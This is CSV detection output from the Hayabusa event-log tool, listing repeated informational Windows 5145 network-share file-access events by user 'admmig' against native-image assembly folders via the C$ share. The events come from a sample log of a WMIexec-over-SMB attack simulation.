2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749#\cba0b74c99ed7ace30d99b1ed03059e9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#\1ccd3b57c9350fc1afa3ed354290f755 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#\0cf0db1a6758c7e0c0ba05029f155cfa : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#\1c10bd935ecce56f3dada604138983f2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\9c705405cffb72e6df411a91a2c062c7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#\88a7ae331deac4585f47de7e6e4277dc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#\e2e911ae8e5924a9ef63135cd8c6b797 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#\f8a02123f968d1ae6940ac5d6a1dd485 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#\e4a04c178babbb8bb5aaf6d60b47d649 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9#\d90607e7c895999c98edb4043f0073e5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\fab34eeddd8d0d9679cce669b2cff4fe : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#\1a33211365967c012f504ade4abce1ed : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#\f21bca07e5816f88c1107f51e64caa60 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#\fb6f372260a08811a4ca7666c60e31e8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC\8dd5d48acfdc4ce750166ebe36623926 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#\eff9f99a173bfe23d56129e79f85e220 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884#\98fa0075b3677ec2d6a5e980c8c194e2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719#\b04af69b54fb462c4c632d0f508d617b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4#\b77a61cdfca8e3f67916586b89eb6df5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#\2cbdedd1fc5676a39a1fb1b534f48d02 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#\e3e82e97635cdd0d33dd1fb39ffe5b5f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797#\4bdb448dffd981eb795d0efeaf81aee9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1#\bbfc6bc472afc457c523dc2738248629 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837#\294124bd4523f5af19788c4942aeba5e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5#\e9ab45e2a1806140421e99300db14933 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3#\278d9be2765837ed33460677146f35e8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137#\82f3f76602a3738000b03df08a71ffe8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032#\d3293b74965baef61a05323c7ec98d92 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
